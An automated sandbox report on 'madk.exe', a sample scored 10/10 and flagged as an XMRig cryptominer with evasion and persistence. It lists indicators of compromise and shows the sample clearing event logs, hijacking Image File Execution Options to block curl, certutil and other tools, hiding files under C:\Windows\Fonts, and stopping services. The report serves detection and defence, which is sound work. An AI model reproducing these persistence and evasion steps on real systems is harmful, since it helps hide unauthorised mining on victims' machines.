xmrig | 025e8edef965f9376d6a0387c3f2952c19e727629920aeea544d963ee89b1594

Resubmissions

26-09-2022 23:59

220926-318jzsdcgn 10

21-06-2022 21:54

220621-1skf3sgcg9 10

Analysis

max time kernel
150s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
26-09-2022 23:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

madk.exe
Size

3.4MB
MD5

d00af5991807952929e5b986afd295c9
SHA1

7f5cc8203f2e22bea24bf7f7b2995dc2ef3571ee
SHA256

025e8edef965f9376d6a0387c3f2952c19e727629920aeea544d963ee89b1594
SHA512

c032eec4bbb1a34113ea86606ae3b1c5d94a7f6f7d52d3347341312d4bf3af2dfa730d549b612a37353a21274eae8f10960ad105fc52c4955c33cccf5f0c1cd6
SSDEEP

98304:jKqtESnFRAW/YS7gCPJDEYFu6GyPuzBPrQ:FnFRV/Bt1E8u6yNQ

Score

10^/10

xmrig discovery evasion miner persistence ransomware upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Clears Windows event logs 1 TTPs 3 IoCs
evasion ransomware

Indicator Removal on Host
T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exe

pid process

4284 wevtutil.exe
2896 wevtutil.exe
1348 wevtutil.exe

pid	process
4284	wevtutil.exe
2896	wevtutil.exe
1348	wevtutil.exe

XMRig Miner payload 4 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/4072-196-0x0000000000400000-0x0000000000DEF000-memory.dmp	xmrig
C:\Windows\Fonts\rundlls.exe	xmrig
\??\c:\windows\Fonts\rundlls.exe	xmrig
behavioral2/memory/4072-241-0x0000000000400000-0x0000000000DEF000-memory.dmp	xmrig

Executes dropped EXE 17 IoCs

Processes:

svchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.execonhost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exerundlls.exe

pid	process
3540	svchost.exe
2664	svchost.exe
1764	svchost.exe
2164	svchost.exe
4848	svchost.exe
3568	svchost.exe
4072	conhost.exe
2888	svchost.exe
5100	svchost.exe
3544	svchost.exe
3676	svchost.exe
4128	svchost.exe
1044	svchost.exe
4440	svchost.exe
4996	svchost.exe
1764	svchost.exe
2640	rundlls.exe

Sets file execution options in registry 2 TTPs 20 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe\debugger = "taskkill.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe\debugger = "taskkill.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\debugger = "taskkill.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe\deebugger = "taskkill.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe\debugger = "taskkill.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\debugger = "taskkill.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe\debugger = "taskkill.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe\deebugger = "taskkill.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe\debugger = "C:\\\\WINDOWS\\\\system32\\\\svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe\debugger = "taskkill.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe	reg.exe

Sets file to hidden 1 TTPs 5 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

4016 attrib.exe
3044 attrib.exe
1388 attrib.exe
4360 attrib.exe
4268 attrib.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
4016	attrib.exe
3044	attrib.exe
1388	attrib.exe
4360	attrib.exe
4268	attrib.exe

UPX packed file 41 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/3460-132-0x0000000000400000-0x0000000000809000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
\??\c:\windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral2/memory/3540-172-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral2/memory/1764-175-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/4848-176-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/2664-173-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral2/memory/3568-180-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/2164-181-0x0000000140000000-0x0000000140053000-memory.dmp	upx
\??\c:\windows\Fonts\conhost.exe	upx
C:\Windows\Fonts\conhost.exe	upx
behavioral2/memory/3460-186-0x0000000000400000-0x0000000000809000-memory.dmp	upx
behavioral2/memory/4072-196-0x0000000000400000-0x0000000000DEF000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral2/memory/2164-210-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral2/memory/2888-214-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/5100-215-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral2/memory/3544-218-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral2/memory/1044-230-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/4440-231-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/1764-236-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/4996-233-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/3544-225-0x0000000140000000-0x0000000140053000-memory.dmp	upx
C:\Windows\Fonts\svchost.exe	upx
C:\Windows\Fonts\svchost.exe	upx
behavioral2/memory/4128-237-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/3676-239-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/3568-240-0x0000000140000000-0x0000000140053000-memory.dmp	upx
behavioral2/memory/4072-241-0x0000000000400000-0x0000000000DEF000-memory.dmp	upx
behavioral2/memory/4128-242-0x0000000140000000-0x0000000140053000-memory.dmp	upx

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

madk.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation madk.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exe

pid process

460 takeown.exe
1812 takeown.exe
3744 takeown.exe
1884 takeown.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	madk.exe

pid	process
460	takeown.exe
1812	takeown.exe
3744	takeown.exe
1884	takeown.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

svchost.exe

description	ioc	process
File opened (read-only)	\??\E:	svchost.exe
File opened (read-only)	\??\F:	svchost.exe
File opened (read-only)	\??\J:	svchost.exe
File opened (read-only)	\??\M:	svchost.exe
File opened (read-only)	\??\O:	svchost.exe
File opened (read-only)	\??\U:	svchost.exe
File opened (read-only)	\??\Y:	svchost.exe
File opened (read-only)	\??\B:	svchost.exe
File opened (read-only)	\??\I:	svchost.exe
File opened (read-only)	\??\K:	svchost.exe
File opened (read-only)	\??\T:	svchost.exe
File opened (read-only)	\??\V:	svchost.exe
File opened (read-only)	\??\X:	svchost.exe
File opened (read-only)	\??\G:	svchost.exe
File opened (read-only)	\??\N:	svchost.exe
File opened (read-only)	\??\S:	svchost.exe
File opened (read-only)	\??\H:	svchost.exe
File opened (read-only)	\??\L:	svchost.exe
File opened (read-only)	\??\P:	svchost.exe
File opened (read-only)	\??\Q:	svchost.exe
File opened (read-only)	\??\R:	svchost.exe
File opened (read-only)	\??\W:	svchost.exe
File opened (read-only)	\??\Z:	svchost.exe
File opened (read-only)	\??\A:	svchost.exe

Drops file in Windows directory 64 IoCs

Processes:

attrib.exeattrib.execonhost.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exemadk.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

description	ioc	process
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	\??\c:\windows\Fonts\rundlls.exe	conhost.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File created	\??\c:\windows\Fonts\rundlls.exe	conhost.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\svchost.exe	attrib.exe
File opened for modification	C:\Windows\Fonts\sqlservr.exe	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File created	\??\c:\windows\Fonts\WinRing0x64.sys	madk.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe
File opened for modification	C:\Windows\Fonts	attrib.exe

Launches sc.exe 23 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
1744	sc.exe
2748	sc.exe
3996	sc.exe
5024	sc.exe
4108	sc.exe
1340	sc.exe
824	sc.exe
3160	sc.exe
4240	sc.exe
3212	sc.exe
3004	sc.exe
4184	sc.exe
4948	sc.exe
3808	sc.exe
4764	sc.exe
1644	sc.exe
3692	sc.exe
5100	sc.exe
1216	sc.exe
2980	sc.exe
776	sc.exe
4916	sc.exe
2888	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Kills process with WMI 4 IoCs
evasion

Processes:

WMIC.exeWMIC.exeWMIC.exeWMIC.exe

pid process

5088 WMIC.exe
1644 WMIC.exe
4576 WMIC.exe
1856 WMIC.exe

pid	process
5088	WMIC.exe
1644	WMIC.exe
4576	WMIC.exe
1856	WMIC.exe

Kills process with taskkill 14 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1188	taskkill.exe
1088	taskkill.exe
2464	taskkill.exe
4976	taskkill.exe
980	taskkill.exe
2712	taskkill.exe
2716	taskkill.exe
4812	taskkill.exe
3756	taskkill.exe
3504	taskkill.exe
5024	taskkill.exe
2212	taskkill.exe
4572	taskkill.exe
4840	taskkill.exe

Modifies registry class 1 IoCs

Processes:

madk.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings madk.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

520 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1528 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings	madk.exe

pid	process
520	reg.exe

pid	process
1528	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

conhost.exe

pid	process
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe
4072	conhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

668

pid	process
668

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exerundlls.exesvchost.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	2712	taskkill.exe
Token: SeDebugPrivilege	5024	taskkill.exe
Token: SeDebugPrivilege	2716	taskkill.exe
Token: SeDebugPrivilege	2212	taskkill.exe
Token: SeDebugPrivilege	1188	taskkill.exe
Token: SeDebugPrivilege	1088	taskkill.exe
Token: SeDebugPrivilege	3756	taskkill.exe
Token: SeDebugPrivilege	4572	taskkill.exe
Token: SeDebugPrivilege	2464	taskkill.exe
Token: SeLockMemoryPrivilege	2640	rundlls.exe
Token: SeAuditPrivilege	3756	svchost.exe
Token: SeAuditPrivilege	3756	svchost.exe
Token: SeAuditPrivilege	3756	svchost.exe
Token: SeIncreaseQuotaPrivilege	5088	WMIC.exe
Token: SeSecurityPrivilege	5088	WMIC.exe
Token: SeTakeOwnershipPrivilege	5088	WMIC.exe
Token: SeLoadDriverPrivilege	5088	WMIC.exe
Token: SeSystemProfilePrivilege	5088	WMIC.exe
Token: SeSystemtimePrivilege	5088	WMIC.exe
Token: SeProfSingleProcessPrivilege	5088	WMIC.exe
Token: SeIncBasePriorityPrivilege	5088	WMIC.exe
Token: SeCreatePagefilePrivilege	5088	WMIC.exe
Token: SeBackupPrivilege	5088	WMIC.exe
Token: SeRestorePrivilege	5088	WMIC.exe
Token: SeShutdownPrivilege	5088	WMIC.exe
Token: SeDebugPrivilege	5088	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5088	WMIC.exe
Token: SeRemoteShutdownPrivilege	5088	WMIC.exe
Token: SeUndockPrivilege	5088	WMIC.exe
Token: SeManageVolumePrivilege	5088	WMIC.exe
Token: 33	5088	WMIC.exe
Token: 34	5088	WMIC.exe
Token: 35	5088	WMIC.exe
Token: 36	5088	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5088	WMIC.exe
Token: SeSecurityPrivilege	5088	WMIC.exe
Token: SeTakeOwnershipPrivilege	5088	WMIC.exe
Token: SeLoadDriverPrivilege	5088	WMIC.exe
Token: SeSystemProfilePrivilege	5088	WMIC.exe
Token: SeSystemtimePrivilege	5088	WMIC.exe
Token: SeProfSingleProcessPrivilege	5088	WMIC.exe
Token: SeIncBasePriorityPrivilege	5088	WMIC.exe
Token: SeCreatePagefilePrivilege	5088	WMIC.exe
Token: SeBackupPrivilege	5088	WMIC.exe
Token: SeRestorePrivilege	5088	WMIC.exe
Token: SeShutdownPrivilege	5088	WMIC.exe
Token: SeDebugPrivilege	5088	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5088	WMIC.exe
Token: SeRemoteShutdownPrivilege	5088	WMIC.exe
Token: SeUndockPrivilege	5088	WMIC.exe
Token: SeManageVolumePrivilege	5088	WMIC.exe
Token: 33	5088	WMIC.exe
Token: 34	5088	WMIC.exe
Token: 35	5088	WMIC.exe
Token: 36	5088	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1644	WMIC.exe
Token: SeSecurityPrivilege	1644	WMIC.exe
Token: SeTakeOwnershipPrivilege	1644	WMIC.exe
Token: SeLoadDriverPrivilege	1644	WMIC.exe
Token: SeSystemProfilePrivilege	1644	WMIC.exe
Token: SeSystemtimePrivilege	1644	WMIC.exe
Token: SeProfSingleProcessPrivilege	1644	WMIC.exe
Token: SeIncBasePriorityPrivilege	1644	WMIC.exe
Token: SeCreatePagefilePrivilege	1644	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

rundlls.exe

pid process

2640 rundlls.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

madk.execonhost.exe

pid process

3460 madk.exe
3460 madk.exe
4072 conhost.exe
4072 conhost.exe

pid	process
2640	rundlls.exe

pid	process
3460	madk.exe
3460	madk.exe
4072	conhost.exe
4072	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

madk.execmd.exe

description	pid	process	target process
PID 3460 wrote to memory of 3520	3460	madk.exe	cmd.exe
PID 3460 wrote to memory of 3520	3460	madk.exe	cmd.exe
PID 3460 wrote to memory of 3520	3460	madk.exe	cmd.exe
PID 3460 wrote to memory of 520	3460	madk.exe	reg.exe
PID 3460 wrote to memory of 520	3460	madk.exe	reg.exe
PID 3460 wrote to memory of 520	3460	madk.exe	reg.exe
PID 3460 wrote to memory of 4248	3460	madk.exe	reg.exe
PID 3460 wrote to memory of 4248	3460	madk.exe	reg.exe
PID 3460 wrote to memory of 4248	3460	madk.exe	reg.exe
PID 3460 wrote to memory of 4584	3460	madk.exe	reg.exe
PID 3460 wrote to memory of 4584	3460	madk.exe	reg.exe
PID 3460 wrote to memory of 4584	3460	madk.exe	reg.exe
PID 3460 wrote to memory of 2088	3460	madk.exe	reg.exe
PID 3460 wrote to memory of 2088	3460	madk.exe	reg.exe
PID 3460 wrote to memory of 2088	3460	madk.exe	reg.exe
PID 3460 wrote to memory of 3392	3460	madk.exe	reg.exe
PID 3460 wrote to memory of 3392	3460	madk.exe	reg.exe
PID 3460 wrote to memory of 3392	3460	madk.exe	reg.exe
PID 3460 wrote to memory of 1216	3460	madk.exe	sc.exe
PID 3460 wrote to memory of 1216	3460	madk.exe	sc.exe
PID 3460 wrote to memory of 1216	3460	madk.exe	sc.exe
PID 3460 wrote to memory of 4184	3460	madk.exe	sc.exe
PID 3460 wrote to memory of 4184	3460	madk.exe	sc.exe
PID 3460 wrote to memory of 4184	3460	madk.exe	sc.exe
PID 3460 wrote to memory of 1340	3460	madk.exe	sc.exe
PID 3460 wrote to memory of 1340	3460	madk.exe	sc.exe
PID 3460 wrote to memory of 1340	3460	madk.exe	sc.exe
PID 3460 wrote to memory of 3808	3460	madk.exe	sc.exe
PID 3460 wrote to memory of 3808	3460	madk.exe	sc.exe
PID 3460 wrote to memory of 3808	3460	madk.exe	sc.exe
PID 3460 wrote to memory of 4948	3460	madk.exe	sc.exe
PID 3460 wrote to memory of 4948	3460	madk.exe	sc.exe
PID 3460 wrote to memory of 4948	3460	madk.exe	sc.exe
PID 3460 wrote to memory of 1744	3460	madk.exe	sc.exe
PID 3460 wrote to memory of 1744	3460	madk.exe	sc.exe
PID 3460 wrote to memory of 1744	3460	madk.exe	sc.exe
PID 3460 wrote to memory of 4764	3460	madk.exe	sc.exe
PID 3460 wrote to memory of 4764	3460	madk.exe	sc.exe
PID 3460 wrote to memory of 4764	3460	madk.exe	sc.exe
PID 3460 wrote to memory of 2748	3460	madk.exe	sc.exe
PID 3460 wrote to memory of 2748	3460	madk.exe	sc.exe
PID 3460 wrote to memory of 2748	3460	madk.exe	sc.exe
PID 3460 wrote to memory of 2712	3460	madk.exe	taskkill.exe
PID 3460 wrote to memory of 2712	3460	madk.exe	taskkill.exe
PID 3460 wrote to memory of 2712	3460	madk.exe	taskkill.exe
PID 3460 wrote to memory of 5024	3460	madk.exe	taskkill.exe
PID 3460 wrote to memory of 5024	3460	madk.exe	taskkill.exe
PID 3460 wrote to memory of 5024	3460	madk.exe	taskkill.exe
PID 3460 wrote to memory of 2716	3460	madk.exe	taskkill.exe
PID 3460 wrote to memory of 2716	3460	madk.exe	taskkill.exe
PID 3460 wrote to memory of 2716	3460	madk.exe	taskkill.exe
PID 3460 wrote to memory of 2536	3460	madk.exe	net.exe
PID 3460 wrote to memory of 2536	3460	madk.exe	net.exe
PID 3460 wrote to memory of 2536	3460	madk.exe	net.exe
PID 3460 wrote to memory of 5056	3460	madk.exe	net1.exe
PID 3460 wrote to memory of 5056	3460	madk.exe	net1.exe
PID 3460 wrote to memory of 5056	3460	madk.exe	net1.exe
PID 3520 wrote to memory of 3936	3520	cmd.exe	attrib.exe
PID 3520 wrote to memory of 3936	3520	cmd.exe	attrib.exe
PID 3520 wrote to memory of 3936	3520	cmd.exe	attrib.exe
PID 3460 wrote to memory of 232	3460	madk.exe	net.exe
PID 3460 wrote to memory of 232	3460	madk.exe	net.exe
PID 3460 wrote to memory of 232	3460	madk.exe	net.exe
PID 3460 wrote to memory of 1644	3460	madk.exe	sc.exe

Views/modifies file attributes 1 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	process
2932	attrib.exe
1976	attrib.exe
3764	attrib.exe
4804	attrib.exe
1644	attrib.exe
2860	attrib.exe
4536	attrib.exe
3416	attrib.exe
4028	attrib.exe
4568	attrib.exe
384	attrib.exe
2248	attrib.exe
4744	attrib.exe
3508	attrib.exe
2916	attrib.exe
2248	attrib.exe
1528	attrib.exe
4900	attrib.exe
4828	attrib.exe
2712	attrib.exe
4140	attrib.exe
4008	attrib.exe
460	attrib.exe
4556	attrib.exe
860	attrib.exe
960	attrib.exe
2472	attrib.exe
2992	attrib.exe
2936	attrib.exe
4844	attrib.exe
744	attrib.exe
4296	attrib.exe
4892	attrib.exe
4764	attrib.exe
4464	attrib.exe
5012	attrib.exe
704	attrib.exe
916	attrib.exe
116	attrib.exe
2264	attrib.exe
4176	attrib.exe
3428	attrib.exe
1636	attrib.exe
3896	attrib.exe
520	attrib.exe
3848	attrib.exe
4396	attrib.exe
4764	attrib.exe
940	attrib.exe
3832	attrib.exe
2500	attrib.exe
3936	attrib.exe
3272	attrib.exe
420	attrib.exe
3936	attrib.exe
4364	attrib.exe
2840	attrib.exe
2248	attrib.exe
4660	attrib.exe
4680	attrib.exe
3704	attrib.exe
2020	attrib.exe
776	attrib.exe
4268	attrib.exe

C:\Users\Admin\AppData\Local\Temp\madk.exe
"C:\Users\Admin\AppData\Local\Temp\madk.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3460

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
2⤵
- Suspicious use of WriteProcessMemory
PID:3520

